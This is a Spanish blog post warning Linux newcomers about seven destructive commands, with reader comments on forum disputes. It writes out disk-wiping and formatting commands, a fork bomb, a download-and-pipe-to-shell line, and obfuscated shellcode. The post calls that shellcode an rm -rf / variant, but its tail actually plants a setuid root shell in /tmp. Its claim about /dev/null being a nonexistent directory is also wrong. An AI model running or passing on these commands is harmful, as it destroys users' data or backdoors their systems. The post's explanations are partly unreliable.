7 comandos peligrosos para Linux

El Esqueleto de TuxSi eres nuevo en Linux, las oportunidades de que alguién te engañe diciendote que uses algún comando para destruir tu sistema son muy altas, por eso es bueno conocer los comandos más peligrosos para GNU/Linux, en Tech Source from Bohol hay un listado de los 7 comando más mortales para Linux, (traducción en Nierox) , algunos de estos comandos pueden formatear el disco duro, dañar los archivos, etc.

  1. rm -rf /
    Este comando borrará de manera recursiva y convincente todos los archivos en el directorio raíz, aquí tienes un video para ver en acción el comando rm -rf /.
  2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p
    release */
    = “\\xeb\\x3e\\x5b\\x31\\xc0\\x50\\x54\\x5a\\x83\\xec\\x64\\x68″
    “\\xff\\xff\\xff\\xff\\x68\\xdf\\xd0\\xdf\\xd9\\x68\\x8d\\x99″
    “\\xdf\\x81\\x68\\x8d\\x92\\xdf\\xd2\\x54\\x5e\\xf7\\x16\\xf7″
    “\\x56\\x04\\xf7\\x56\\x08\\xf7\\x56\\x0c\\x83\\xc4\\x74\\x56″
    “\\x8d\\x73\\x08\\x56\\x53\\x54\\x59\\xb0\\x0b\\xcd\\x80\\x31″
    “\\xc0\\x40\\xeb\\xf9\\xe8\\xbd\\xff\\xff\\xff\\x2f\\x62\\x69″
    “\\x6e\\x2f\\x73\\x68\\x00\\x2d\\x63\\x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    Esta es la versión hexadecimal de rm-rf / que pueden engañar hasta a los usuarios expertos de Linux.
  3. mkfs.ext3 /dev/sda
    Este comando formatea la partición que se menciona después de mkfs.
  4. :(){:|:&};:
    A este comando se le conoce cómo bomba fork, ejecutar un gran número de procesos hasta que el sistema se congela. Esto puede conducir a la corrupción de datos.
  5. any_command > /dev/sda
    Este comando provoca perdida total de datos, en la particion que se menciona en el comando
  6. wget http://alguna_fuente_no_confiable -O- | sh
    Esto descarga paquetes de alguna fuente no confiable y la ejecuta, debes tener mucho cuidado ya que puede ser código malicioso
  7. mv /home/tu-carpeta-home/* /dev/null
    Este comando va a mover todo el contenido de tu carpeta Home a un directorio que no existe, esto significa que ya nunca volverás a ver tus archivos.

Por ninguna razón vayas a ejecutar estos comando en Linux, esto es más bien con fines didácticos.

Escríbe un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

12 comentarios en “7 comandos peligrosos para Linux”

  1. Hace un tiempo tuve una discucion en ubuntu-es.org que me costo la suspension de mi cuenta y fue precisamente algo relacionado con esto.

    En su terquedad de querer que todos usen Linux, comentaba el individuo que Windows era el peor OS en la historia. A lo que conteste que la diferencia entre Windows y Linux es la diferencia de cantidad de usuarios que lo usan alrededor del mundo. Que el dia en que Linux sea igualmente usado que Windows seria cuando los problemas de seguridad realmente empezarian con comandos mal usados desde la consola.
    Empezando con todos los novatos de ambos OS ejecutando instrucciones que no entienden.

    Ya me imagino haciendo un script de rm -rf / y mandarlo como otra cosa.

    «Ejecutalo y cuando te pida la contraseña la escribes y te arregla el problema»

  2. Trata de hacer cualquier comentario que opaque a Linux en ese foro y te daras cuenta de la prepotencia de los moderadores. Ese es el mayor problema de Linux, sus usuarios.
    Lo siento si esto se salio de cotexto.

  3. Tambien hay que tomar en cuenta que para ejecutar este tipo de comandos el user deberia de tener permisos para sobre o para escribir en donde se corran los comandos por ejemplo el rm para el directorio raiz, solo siendo root se puede hacer, mucho sistemas incluyendo el mas conocido ubuntu en la console incorpora el sudo que es una orden que con permisos de root ejecuta una accion, pero te pide una contraseña, yo no tendria miedo de nada de esto.

  4. No se trata de prepotencia por parte de los usuarios linux. Se trata de una filosofía de software que no entiende la mayoria de la gente que no usa software linux. Linux vive gracias a la coperación de gente alrededor del mundo que aporta sus conocimientos para concebir un SO o tecnología disponible. Tecnológicamente hablando las personas que critican a linux normalmente no aportan, y creen que sus críticas son constructivas. La critica más constructiva hacia linux por parte de usuarios windows se torna un verdadero insulto cuando se construye o concibe un Sistema operativo con fines bondadosos que nos lleven a evolucionar a todos por igual sin fines de lucro, expresados pero no entendidos filosoficamente en las libertades del software libre por la gente detractora o usuarios de software privativo.